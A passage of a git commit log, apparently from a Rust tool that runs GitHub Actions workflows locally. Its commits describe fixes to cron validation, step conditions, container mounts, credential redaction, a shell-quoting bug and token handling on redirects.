`id`, `working_directory`, `shell`, and `timeout_minutes` despite the
YAML potentially having them. And `is_valid_cron_atom` was rejecting
valid POSIX cron syntax like `5/2`.
* refactor(executor): extract step guards into shared helper, fix steps.* default
The step-level if-condition check and continue-on-error handling was
copy-pasted between execute_job and execute_matrix_job with subtly
different control flow — one sets job_success=false and breaks, the
other returns Ok(JobResult{Failure}) immediately. Two copies of the
same logic that *already* disagree is not redundancy, it's a bug
waiting to happen. Let's fix that.
Extract run_step_with_guards() that encapsulates the if-condition
evaluation, execute_step call, and continue-on-error wrapping into
a single StepOutcome enum. Both job execution paths now call this
shared helper.
While at it, fix the condition evaluator defaulting bare steps.*
references to true — "steps.build.outcome == 'failure'" should
*not* optimistically run the step. Now only always() and success()
default to true; everything else (bare step refs, failure(),
cancelled()) conservatively defaults to false.
Also add serde alias "matrix" on Job.strategy so old workflows with
flat matrix: at job level still parse, and document the intentional
or_insert_with in matrix include merging per GitHub Actions spec.
* fix: clean up review findings in step guards, secret store, and test fixture
The PR review flagged three issues worth fixing before merge.
First, run_step_with_guards had a bogus StepStatus::Skipped check
in the abort_job logic. The condition tested for Failure *or*
Skipped, then only actually aborted on Failure — meaning the
Skipped branch did nothing except confuse anyone reading the code.
Simplify to just check Failure directly.
Second, EncryptedSecretStore::from_json would silently fail with a
generic serde error when fed the old serialization format (which
had a shared top-level nonce field). Now it detects the old format
by checking for the "nonce" key and returns a clear error pointing
at BREAKING_CHANGES.md. Added a test for this.
Third, tests/workflows/continue-on-error-test.yml was an orphan
fixture — nothing referenced it. The same content is already
tested inline by parse_continue_on_error_workflow in the parser.
Removed it.
* fix: correct cron day-of-week range, steps. false positive, and Step boilerplate
Three issues from PR review, all straightforward:
The cron validator was rejecting day-of-week value 7, which is a
perfectly valid Sunday alias in both POSIX cron and GitHub Actions.
The max was 6 when it should be 7. The named-value resolver guard
also needed updating from `max == 6` to `max >= 6` so named days
still resolve correctly with the wider range.
The `evaluate_job_condition` heuristic for detecting `steps.*`
references was using a bare `contains("steps.")`, which means an
env var like `env.MY_STEPS_COUNT` would falsely trigger it and
short-circuit to false. Now we check that the character before
"steps." is either start-of-string or non-alphanumeric. Not a
full expression parser, but it stops the obvious false positives.
While at it, add a `Step::with_run` constructor so the GitLab
converter doesn't need three identical 12-field struct literals
that silently break every time someone adds a field to Step.
* fix: harden steps. boundary check, document condition semantics, dedup cycles
The steps. word-boundary heuristic in evaluate_job_condition was
checking for alphanumeric characters before "steps." to avoid false
positives on env vars like "env.MY_STEPS_COUNT". It turns out that
underscore is *not* alphanumeric, so "env._STEPS_CHECK" would
incorrectly trigger the step-reference path and return false.
While at it, the always() && failure() compound expression returning
true got a proper comment explaining *why* that's intentional — we
lack step-status context locally, so we'd rather over-run than
silently skip steps. Not ideal, but honest.
The DFS cycle detector in detect_cyclic_needs could report the same
cycle multiple times depending on HashMap iteration order. Normalize
cycles by rotating the node list to start at the lexicographically
smallest node, then deduplicate via a HashSet. Same cycle from
different entry points now gets reported exactly once.
* fix: squash review nits — double parse, clippy warnings, lost flag
Three leftover issues from the codebase review PR:
The from_json() deserialization was parsing the JSON *twice* — once
into serde_json::Value to sniff for the old nonce field, then again
from the raw string into the actual struct. Parse once, use
from_value() on the already-parsed Value. Not rocket science.
The cycle detector had two clippy warnings: .iter().cloned().collect()
on a slice (just use .to_vec(), please) and .min_by_key() cloning a
double reference instead of comparing properly. Switch to .min_by()
with an explicit cmp.
The show_action_messages flag was being silently dropped in
execute_workflow_cli — hardcoded to false regardless of what the user
asked for. Propagate it through the function signature and the TUI
fallback path so it actually does something.
|
||
|
|
219c27097f |
Merge pull request #72 from bahdotsh/fix/module-review-bugs
fix: correct multiple bugs found during full codebase review |
||
|
|
b49276a026 |
fix: stop hard-exiting on unreadable directory and add #[must_use] to ContainerOutput
The validate subcommand was calling std::process::exit(1) when a directory couldn't be read, which is a rather aggressive response to a permission error. Especially when the code four lines above handles a *missing* path by setting validation_failed and moving on to the next one. Consistency is nice. Let's have some. Split the match from the method chain (because continue is a statement, not an expression, and Rust has opinions about that) and replaced the exit(1) with the same continue pattern. While at it, slap #[must_use] on ContainerOutput so the compiler will yell at anyone who discards a run_container result without checking exit_code. All current callers already bind it, so this is purely forward-looking — but the kind of bug it prevents is the silent-misexecution kind, and those are nobody's favorite. |
||
|
|
422a035c40 |
test: add tests for review fixes and clean up dead code
The previous commit fixed a bunch of bugs but left a few loose ends. The next_job() function still had a redundant bounds check that previous_job() already had cleaned up — the .filter() call makes the inner `if workflow_idx >= self.workflows.len()` dead code. Let's not leave half-finished refactors lying around. While at it, add tests for the three behavioral changes that *really* should have had tests from the start: emulation runtime returning Ok on non-zero exit codes, log processor not panicking on multi-byte UTF-8 near bracket boundaries, and step validator correctly rejecting steps with only a name field. Also fix formatting (cargo fmt) and a clippy warning about items defined after the test module. |
||
|
|
aa3366a797 |
fix: correct multiple bugs found during full codebase review
It turns out that build_image_inner() in docker.rs was calling .elapsed() on a SystemTime to compute the tar mtime. That gives you "seconds since modification" — which is *not* what mtime means. Mtime is seconds since the Unix epoch. The fix is .duration_since(UNIX_EPOCH) like a normal person would use. While at it, the docker logs() call was passing None for options, which means it wasn't actually requesting stdout or stderr. So we were collecting logs from a stream that might not have any. Explicitly set stdout: true and stderr: true. The emulation runtime had a fun behavioral mismatch with Docker and Podman: it returned Err on non-zero exit codes, swallowing all stdout/stderr output. Docker and Podman return Ok with the exit code and let the caller decide what to do. The engine already handles non-zero exit codes in the Ok path, so the emulation was just silently eating useful output for no reason. The UI had a bounds check in next_job() that was mysteriously absent from previous_job() — the kind of inconsistency that waits patiently for someone to hit a stale workflow index and get a panic. Added the same .filter() guard. String slicing in the log processor wasn't checking char boundaries, which is fine until someone's log contains a multi-byte UTF-8 character before a bracket. Added is_char_boundary() checks. Step validation was accepting steps with only a 'name' field and no 'uses' or 'run', which is not a valid step in GitHub Actions. Fixed the validation to require at least one of the two fields that actually *do* something. Replaced .expect() calls on directory reads in main.rs with proper error handling. Panicking because a directory isn't readable is not great user experience. |
||
|
|
debd89b8c6 |
Merge pull request #71 from bahdotsh/fix/58-support-job-container-directive
fix(executor): support job-level container directive |
||
|
|
3296ad1f62 |
fix(executor): guard against empty container image and volume paths
It turns out that if someone writes `container:` with an empty image
string, we'd happily pass "" to Docker and let it figure out what
that means. Spoiler: it doesn't.
Similarly, volume specs like "/host:" or ":/container" would produce
a PathBuf::from("") mount, which is the kind of thing that makes
container runtimes *very* unhappy. Let's just skip those with a
warning instead of pretending they're valid.
While at it, replace the derived Serialize on ContainerCredentials
with a custom impl that redacts the password field. The Debug impl
was already doing this, but serde_json::to_string was still happily
dumping passwords in plaintext. Please don't do that.
|
||
|
|
2c2a633e0e |
fix(executor): harden container config against credential leaks and empty volumes
ContainerCredentials had a derived Debug impl that would happily dump passwords into logs, panic output, and anywhere else Debug gets called. That's *exactly* the kind of thing that bites you at 3am when someone adds a debug trace and suddenly credentials show up in plaintext in your log aggregator. Replace the derived Debug with a manual impl that redacts the password field. While at it, add a guard for empty volume specs that would otherwise produce undefined Docker behavior, a note about the splitn limitation with Windows paths, and fix clippy warnings on the test assertions. |
||
|
|
e76f723034 |
fix(executor): fix phantom env paths and silent volume option drop
The remap_env_file closure had a fallback that would *invent* paths like /github/workflow/github_output when the corresponding env key didn't actually exist in job_env. Those paths point to nothing on the mounted volume, so any step that tries to write to them gets a lovely surprise. Only remap keys that actually exist in job_env now. If GITHUB_OUTPUT isn't set, we don't pretend it is. While at it, volume mount options like :ro and :rw were being silently stripped with no warning. A user specifying :ro expects a read-only mount — silently giving them read-write is not great. Emit a warning when we drop mount options, matching the existing pattern in warn_unsupported_container_fields. Add tests for both fixes plus container env precedence coverage. |
||
|
|
2e1452d237 |
fix(executor): fix volume parsing and hardcoded env path remapping
The volume spec parser was using splitn(2, ':'), which means a Docker volume like "/host:/container:ro" would produce a container path of "/container:ro". That's not a path, that's a path with garbage appended. splitn(3, ':') strips the options correctly. The env path remapping was hardcoding filenames like "/github/workflow/env" instead of deriving them from the actual host paths. If environment.rs ever renames those files, the remapping silently breaks and you get to debug phantom container failures. Derive the filename from the real path instead. While at it, add unit tests for prepare_container_mounts and get_effective_runner_image — the two core functions from the container directive work that had zero test coverage. Nine tests covering Docker/Podman remapping, volume parsing (host:container, single-path, :ro/:rw options), and the image selection fallback. |
||
|
|
ecb9392d52 |
refactor(executor): deduplicate container mount logic and fix review issues
The container directive support in
|
||
|
|
2eae320953 |
fix(executor): support job-level container directive
It turns out that the Job struct in the parser had *no* container
field at all. When a workflow specified `container: alpine:3.22.1`,
serde silently dropped it, and the engine happily derived the runner
image from `runs-on` instead. So `apk add` runs inside Ubuntu.
Confusion ensues.
Add a JobContainer type with a custom deserializer that handles both
the string form (`container: alpine:3.22.1`) and the object form
(`container: { image: ..., env: ..., volumes: ... }`). A new
get_effective_runner_image() prefers the container image over the
runs-on mapping.
While at it, fix the GITHUB_ENV volume mounting for real container
runtimes. The old code identity-mounted the host temp path into the
container, which breaks on macOS with Podman because /var/folders
doesn't exist in the VM. Now we mount the github env directory at
/github/workflow/ and remap the env vars to match.
Container-level env vars and volumes are also wired through with
correct precedence (step > job > container).
Closes #58
|
||
|
|
39006fd232 |
Merge pull request #70 from bahdotsh/fix/48-resolve-action-yml-for-docker-image
fix: resolve action.yml from remote repos to determine correct Docker image |
||
|
|
c21182d389 |
fix(executor): handle sub-path action refs and stop mutating env in tests
It turns out that action references like `github/codeql-action/init@v3` were being treated as if `github/codeql-action/init` was the repo name. The resolver would then try to fetch action.yml from `github/codeql-action/init/v3/action.yml` instead of the correct `github/codeql-action/v3/init/action.yml`. Same bug hit shallow_clone — it would try to clone a repo URL with the sub-path baked in, which obviously doesn't exist. Add a `sub_path` field to `ActionInfo` so `resolve_action` splits `owner/repo/path@ref` into its actual components. The resolver, cache key, and composite action clone all use the sub-path correctly now. While at it, stop using `std::env::set_var`/`remove_var` in the wiremock tests. Those are unsound in multi-threaded test binaries (Rust 1.83+ rightly marks them unsafe). Refactored `fetch_and_parse` to accept the token as a parameter — the tests just pass it directly, no env mutation needed. |
||
|
|
8661771b8a |
fix(executor): fix shell injection, env var leak in tests, and missing docs
Three issues from code review, all small but all real:
The echo fallback in execute_step was interpolating the `uses` string
directly into a single-quoted sh -c argument. A workflow with a
single quote in the action ref would break out of the shell string.
Escape single quotes with the standard '\'' pattern.
The fetch_and_parse tests were calling env::remove_var("GITHUB_TOKEN")
and env::set_var() without saving and restoring the original value.
If GITHUB_TOKEN was set before the test suite ran, it would be
permanently wiped for subsequent tests. All three tests now
save/restore properly.
While at it, document the ActionInfo::version field semantics —
it's empty for docker/local refs, holds the git ref for GitHub
action refs, and defaults to "main" when omitted. Future readers
shouldn't have to guess.
|
||
|
|
f53a45e25d |
fix(executor): fix docker digest parsing, token leak in redirects, and missing tests
It turns out that resolve_action was blindly splitting on '@' for *all* action references, including Docker image refs like docker://alpine@sha256:abc123. The '@' in a Docker digest is not a version separator — it's part of the image reference. Splitting it produces a nonsensical repository and a fake "version" that happens to be a SHA256 digest. Nobody noticed because the Docker path doesn't use the version field, but the parsed data was still wrong. While at it, the auth retry path in fetch_and_parse was constructing a brand new reqwest::Client on every single 404-then-retry cycle. That means a fresh TLS handshake each time, which is wasteful when we already have a perfectly good static client pattern. Promote the no-redirect client to a static Lazy, same as HTTP_CLIENT. The auth redirect flow — where we send GITHUB_TOKEN to the origin but strip it before following a redirect to a CDN — had zero test coverage. This is the kind of security invariant that *really* should not depend on code review alone. Add wiremock-based tests that verify the token does not leak to redirect targets, plus tests for the basic auth retry and 404 paths. Parameterize fetch_and_parse with a base_url so wiremock can intercept the requests. |
||
|
|
9bdf24f86b |
fix(executor): fix review issues in action resolver and engine
The PR review flagged three things that deserved fixing: The action resolver was silently swallowing the *first* error when action.yml failed and then retrying action.yaml. If action.yml existed but had a parse error, you'd never know — it just quietly tried the other filename. Now both error messages are combined so you actually get useful diagnostics. There was a stale comment in engine.rs that read "rest of the existing code for handling regular actions" — which was left over from the refactor and described absolutely nothing. Gone. The SHA detection logic in shallow_clone was inline and untested. Extract it into is_git_sha() and add proper tests covering valid SHA-1, short hashes, branch names, tags, non-hex input, and off-by-one lengths. |